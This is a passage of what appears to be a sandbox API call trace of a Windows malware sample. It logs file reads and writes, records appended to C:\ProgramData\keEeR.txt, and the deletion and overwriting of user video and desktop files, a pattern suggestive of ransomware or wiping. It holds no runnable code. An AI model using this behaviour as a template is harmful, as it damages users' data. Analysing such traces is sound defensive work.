lpNumberOfBytesWritten=0x125e7d78, lpOverlapped=0x0 | out: lpBuffer=0x125eb000*, lpNumberOfBytesWritten=0x125e7d78*=0x80, lpOverlapped=0x0) returned 1 [0321.371] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0x1) returned 0x102 [0321.376] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0321.376] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3254fb30, ulCount=0x10, ulNumEntriesRemoved=0x3254fb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3254fb30, ulNumEntriesRemoved=0x3254fb10) returned 0 [0321.377] SetEvent (hEvent=0x150) returned 1 [0321.377] SetEvent (hEvent=0x214) returned 1 [0321.377] SetEvent (hEvent=0x184) returned 1 [0321.377] SetEvent (hEvent=0x1ac) returned 1 [0321.377] ReadFile (in: hFile=0x23c, lpBuffer=0x17c08000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x125e7d68, lpOverlapped=0x0 | out: lpBuffer=0x17c08000*, lpNumberOfBytesRead=0x125e7d68*=0x71fb, lpOverlapped=0x0) returned 1 [0321.379] WriteFile (in: hFile=0x1f8, lpBuffer=0x17c08000*, nNumberOfBytesToWrite=0x71fb, lpNumberOfBytesWritten=0x125e7d74, lpOverlapped=0x0 | out: lpBuffer=0x17c08000*, lpNumberOfBytesWritten=0x125e7d74*=0x71fb, lpOverlapped=0x0) returned 1 [0321.388] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0321.453] SetEvent (hEvent=0x184) returned 1 [0321.453] ReadFile (in: hFile=0x23c, lpBuffer=0x17c08000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x125e7d68, lpOverlapped=0x0 | out: lpBuffer=0x17c08000*, lpNumberOfBytesRead=0x125e7d68*=0x0, lpOverlapped=0x0) returned 1 [0321.453] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0321.455] CloseHandle (hObject=0x1f8) returned 1 [0321.455] CloseHandle (hObject=0x23c) returned 1 [0321.456] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x23c [0321.456] GetConsoleMode (in: hConsoleHandle=0x23c, lpMode=0x125e7e94 | out: lpMode=0x125e7e94) returned 0 [0321.456] WriteFile (in: hFile=0x23c, lpBuffer=0x12348270*, nNumberOfBytesToWrite=0x2f, lpNumberOfBytesWritten=0x125e7e64, lpOverlapped=0x0 | out: lpBuffer=0x12348270*, lpNumberOfBytesWritten=0x125e7e64*=0x2f, lpOverlapped=0x0) returned 1 [0321.456] CloseHandle (hObject=0x23c) returned 1 [0321.456] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\lPGoKFmU.swf" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\lpgokfmu.swf")) returned 1 [0321.487] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\lPGoKFmU.swf" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\lpgokfmu.swf"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x23c [0321.488] GetConsoleMode (in: hConsoleHandle=0x23c, lpMode=0x125e7e88 | out: lpMode=0x125e7e88) returned 0 [0321.488] WriteFile (in: hFile=0x23c, lpBuffer=0x19830000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x125e7e78, lpOverlapped=0x0 | out: lpBuffer=0x19830000*, lpNumberOfBytesWritten=0x125e7e78*=0xfa000, lpOverlapped=0x0) returned 1 [0321.506] CloseHandle (hObject=0x23c) returned 1 [0321.507] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\lPGoKFmU.swf" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\lpgokfmu.swf")) returned 1 [0321.512] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0321.552] SetEvent (hEvent=0x220) returned 1 [0321.553] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0321.567] SetEvent (hEvent=0x220) returned 1 [0321.567] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0321.571] SetEvent (hEvent=0x220) returned 1 [0321.571] SetEvent (hEvent=0x1ac) returned 1 [0321.571] SetEvent (hEvent=0x14c) returned 1 [0321.571] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0321.573] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0321.589] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0321.589] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0321.591] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0321.592] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0321.643] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0321.657] SetEvent (hEvent=0x14c) returned 1 [0321.657] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0321.657] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0321.685] SetEvent (hEvent=0x14c) returned 1 [0321.685] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0321.687] SetEvent (hEvent=0x220) returned 1 [0321.687] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) Thread: id = 9 os_tid = 0x1248 [0123.759] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0xfffffffe, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3264ff58, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3264ff58*=0x124) returned 1 [0123.759] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x128 [0123.759] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0123.833] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0125.306] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0141.646] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0141.721] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0141.741] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0141.846] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0143.738] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0143.782] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0143.890] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0144.244] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0144.393] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0144.433] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0144.505] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0144.625] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0144.657] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0144.724] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0144.862] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0146.606] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0146.941] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0146.948] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0147.045] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0149.426] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0149.519] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0149.531] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0149.630] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0151.373] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0151.499] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0151.555] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0151.755] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0153.204] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0153.320] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0153.334] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0153.395] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0154.802] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0154.896] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0154.906] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0155.005] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0157.587] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0157.706] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0157.718] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0157.777] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0159.310] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0159.455] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0159.513] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0159.619] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0161.841] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0161.932] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0161.943] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0162.018] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0165.907] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0165.991] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0166.003] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0166.067] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0167.824] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0167.951] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0168.041] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0168.185] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0169.973] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0170.102] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0170.118] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0170.202] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0171.899] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0172.001] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0172.033] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0172.115] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0174.434] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0174.503] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0174.521] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0175.343] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0176.811] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0176.857] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0176.910] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0177.370] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0180.146] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0180.200] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0180.212] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0180.312] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0181.942] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0181.981] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0181.994] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0182.070] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0183.838] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0183.877] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0183.943] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0184.011] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0186.671] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0186.712] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0186.724] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0186.863] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0190.769] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0190.854] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0190.866] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0190.941] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0193.385] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0193.431] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0193.445] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0193.522] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0200.537] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0200.579] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0200.683] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0202.659] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0202.711] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0202.727] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0202.791] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0204.198] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0204.248] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0204.268] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0204.326] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0205.990] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0206.045] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0206.112] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0207.778] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0207.831] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0207.843] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0207.898] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0210.040] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0210.059] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0210.126] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0211.607] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0211.738] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0211.766] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0211.894] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0214.001] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0214.059] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0214.141] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0214.240] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0216.134] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0216.186] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0216.200] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0216.283] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0217.867] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0217.918] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0217.931] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0217.988] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0219.112] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0219.163] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0219.178] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0219.247] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0222.373] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0222.422] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0222.504] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0223.681] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0223.712] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0223.784] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0224.855] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0224.901] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0225.031] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0226.190] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0226.224] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0226.286] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0227.426] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0227.489] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0227.572] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0228.632] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0228.677] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0228.746] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0230.085] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0230.337] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0231.312] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0231.743] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0235.087] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0235.361] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0235.382] WaitForSingleObject (hHandle=0x128, dwMilliseconds=0xffffffff) returned 0x0 [0256.635] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3264fadc, ulCount=0x10, ulNumEntriesRemoved=0x3264fabc, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3264fadc, ulNumEntriesRemoved=0x3264fabc) returned 0 [0256.636] SetEvent (hEvent=0x14c) returned 1 [0256.636] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3264faac, ulCount=0x10, ulNumEntriesRemoved=0x3264fa8c, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3264faac, ulNumEntriesRemoved=0x3264fa8c) returned 0 [0256.636] GetQueuedCompletionStatusEx (CompletionPort=0x174, lpCompletionPortEntries=0x3264faac, ulCount=0x10, ulNumEntriesRemoved=0x3264fa8c, dwMilliseconds=0xffffffff, fAlertable=0) Thread: id = 10 os_tid = 0x124c [0123.828] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0xfffffffe, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3278ff58, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3278ff58*=0x148) returned 1 [0123.828] SetEvent (hEvent=0x128) returned 1 [0123.828] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x14c [0123.828] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0256.638] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0256.813] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x100000, lpStartAddress=0x44bd00, lpParameter=0x12760000, dwCreationFlags=0x10000, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x178 [0256.814] CloseHandle (hObject=0x178) returned 1 [0256.814] SetEvent (hEvent=0x104) returned 1 [0256.814] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0256.818] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0256.818] SetEvent (hEvent=0x134) returned 1 [0256.818] SetEvent (hEvent=0x104) returned 1 [0256.818] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0256.819] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0256.821] SetEvent (hEvent=0x104) returned 1 [0256.822] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0256.822] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0258.383] SetEvent (hEvent=0x134) returned 1 [0258.383] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0258.718] SetEvent (hEvent=0x104) returned 1 [0258.719] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0x1) returned 0x102 [0258.859] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0258.859] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3278fb30, ulCount=0x10, ulNumEntriesRemoved=0x3278fb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3278fb30, ulNumEntriesRemoved=0x3278fb10) returned 0 [0258.859] SetEvent (hEvent=0x150) returned 1 [0258.859] SetEvent (hEvent=0x104) returned 1 [0258.859] SetEvent (hEvent=0x134) returned 1 [0258.859] GetProcAddress (hModule=0x75600000, lpProcName="ReadFile") returned 0x75626bb0 [0258.861] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0x1) returned 0x102 [0258.873] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0258.873] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0x1) returned 0x102 [0258.889] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0258.889] SetEvent (hEvent=0x12c) returned 1 [0258.889] SetEvent (hEvent=0x134) returned 1 [0258.889] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0258.948] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3278fb34, ulCount=0x10, ulNumEntriesRemoved=0x3278fb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3278fb34, ulNumEntriesRemoved=0x3278fb14) returned 0 [0258.948] SetEvent (hEvent=0x150) returned 1 [0258.948] SetEvent (hEvent=0x134) returned 1 [0258.949] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x100000, lpStartAddress=0x44bd00, lpParameter=0x12760240, dwCreationFlags=0x10000, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x194 [0258.950] CloseHandle (hObject=0x194) returned 1 [0258.950] ReadFile (in: hFile=0x17c, lpBuffer=0x12770000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x1263bd68, lpOverlapped=0x0 | out: lpBuffer=0x12770000*, lpNumberOfBytesRead=0x1263bd68*=0x9abe, lpOverlapped=0x0) returned 1 [0258.952] WriteFile (in: hFile=0x180, lpBuffer=0x12770000*, nNumberOfBytesToWrite=0x9abe, lpNumberOfBytesWritten=0x1263bd74, lpOverlapped=0x0 | out: lpBuffer=0x12770000*, lpNumberOfBytesWritten=0x1263bd74*=0x9abe, lpOverlapped=0x0) returned 1 [0259.025] ReadFile (in: hFile=0x17c, lpBuffer=0x12770000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x1263bd68, lpOverlapped=0x0 | out: lpBuffer=0x12770000*, lpNumberOfBytesRead=0x1263bd68*=0x0, lpOverlapped=0x0) returned 1 [0259.026] CloseHandle (hObject=0x180) returned 1 [0259.028] CloseHandle (hObject=0x17c) returned 1 [0259.028] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0259.029] GetConsoleMode (in: hConsoleHandle=0x17c, lpMode=0x1263be94 | out: lpMode=0x1263be94) returned 0 [0259.106] WriteFile (in: hFile=0x17c, lpBuffer=0x123801c0*, nNumberOfBytesToWrite=0x37, lpNumberOfBytesWritten=0x1263be64, lpOverlapped=0x0 | out: lpBuffer=0x123801c0*, lpNumberOfBytesWritten=0x1263be64*=0x37, lpOverlapped=0x0) returned 1 [0259.106] CloseHandle (hObject=0x17c) returned 1 [0259.107] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\ZH5t5F Pn3U-oGq.mp4" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\zh5t5f pn3u-ogq.mp4")) returned 1 [0259.146] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3278fb30, ulCount=0x10, ulNumEntriesRemoved=0x3278fb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3278fb30, ulNumEntriesRemoved=0x3278fb10) returned 0 [0259.147] SetEvent (hEvent=0x190) returned 1 [0259.147] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x100000, lpStartAddress=0x44bd00, lpParameter=0x12760480, dwCreationFlags=0x10000, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x17c [0259.148] CloseHandle (hObject=0x17c) returned 1 [0259.151] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0x1) returned 0x102 [0259.316] WaitForSingleObject 